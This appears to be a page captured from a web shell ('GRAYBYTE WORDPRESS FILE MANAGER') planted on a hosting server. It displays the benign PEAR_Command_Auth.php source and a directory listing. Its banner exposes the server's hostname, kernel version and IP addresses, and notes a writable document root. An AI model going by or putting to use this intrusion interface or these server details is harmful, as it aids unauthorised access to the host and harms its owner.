✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.36
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/php71/usr/share/pear/PEAR/Command//Auth.php
<?php
/**
 * PEAR_Command_Auth (login, logout commands)
 *
 * PHP versions 4 and 5
 *
 * @category   pear
 * @package    PEAR
 * @author     Stig Bakken <ssb@php.net>
 * @author     Greg Beaver <cellog@php.net>
 * @copyright  1997-2009 The Authors
 * @license    http://opensource.org/licenses/bsd-license.php New BSD License
 * @link       http://pear.php.net/package/PEAR
 * @since      File available since Release 0.1
 * @deprecated since 1.8.0alpha1
 */

/**
 * base class
 */
require_once 'PEAR/Command/Channels.php';

/**
 * PEAR commands for login/logout
 *
 * @category   pear
 * @package    PEAR
 * @author     Stig Bakken <ssb@php.net>
 * @author     Greg Beaver <cellog@php.net>
 * @copyright  1997-2009 The Authors
 * @license    http://opensource.org/licenses/bsd-license.php New BSD License
 * @version    Release: 1.10.16
 * @link       http://pear.php.net/package/PEAR
 * @since      Class available since Release 0.1
 * @deprecated since 1.8.0alpha1
 */
class PEAR_Command_Auth extends PEAR_Command_Channels
{
    var $commands = array(
        'login' => array(
            'summary' => 'Connects and authenticates to remote server [Deprecated in favor of channel-login]',
            'shortcut' => 'li',
            'function' => 'doLogin',
            'options' => array(),
            'doc' => '<channel name>
WARNING: This function is deprecated in favor of using channel-login

Log in to a remote channel server.  If <channel name> is not supplied,
the default channel is used. To use remote functions in the installer
that require any kind of privileges, you need to log in first.  The
username and password you enter here will be stored in your per-user
PEAR configuration (~/.pearrc on Unix-like systems).  After logging
in, your username and password will be sent along in subsequent
operations on the remote server.',
            ),
        'logout' => array(
            'summary' => 'Logs out from the remote server [Deprecated in favor of channel-logout]',
            'shortcut' => 'lo',
            'function' => 'doLogout',
            'options' => array(),
            'doc' => '
WARNING: This function is deprecated in favor of using channel-logout

Logs out from the remote server.  This command does not actually
connect to the remote server, it only deletes the stored username and
password from your user configuration.',
            )

        );

    /**
     * PEAR_Command_Auth constructor.
     *
     * @access public
     */
    function __construct(&$ui, &$config)
    {
        parent::__construct($ui, $config);
    }
}


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
23 May 2025 7.02 AM
root / root
0755
Auth.php
2.511 KB
12 May 2025 5.01 PM
root / root
0644
Auth.xml
1.199 KB
12 May 2025 5.01 PM
root / root
0644
Build.php
2.581 KB
12 May 2025 5.01 PM
root / root
0644
Build.xml
0.379 KB
12 May 2025 5.01 PM
root / root
0644
Channels.php
32.661 KB
12 May 2025 5.01 PM
root / root
0644
Channels.xml
4.119 KB
12 May 2025 5.01 PM
root / root
0644
Common.php
8.021 KB
12 May 2025 5.01 PM
root / root
0644
Config.php
15.104 KB
12 May 2025 5.01 PM
root / root
0644
Config.xml
3.303 KB
12 May 2025 5.01 PM
root / root
0644
Install.php
49.808 KB
12 May 2025 5.01 PM
root / root
0644
Install.xml
8.487 KB
12 May 2025 5.01 PM
root / root
0644
Mirror.php
4.404 KB
12 May 2025 5.01 PM
root / root
0644
Mirror.xml
0.603 KB
12 May 2025 5.01 PM
root / root
0644
Package.php
39.205 KB
12 May 2025 5.01 PM
root / root
0644
Package.xml
7.053 KB
12 May 2025 5.01 PM
root / root
0644
Pickle.php
15.522 KB
12 May 2025 5.01 PM
root / root
0644
Pickle.xml
1.151 KB
12 May 2025 5.01 PM
root / root
0644
Registry.php
45.2 KB
12 May 2025 5.01 PM
root / root
0644
Registry.xml
1.748 KB
12 May 2025 5.01 PM
root / root
0644
Remote.php
29.283 KB
12 May 2025 5.01 PM
root / root
0644
Remote.xml
3.233 KB
12 May 2025 5.01 PM
root / root
0644
Test.php
11.852 KB
12 May 2025 5.01 PM
root / root
0644
Test.xml
1.603 KB
12 May 2025 5.01 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF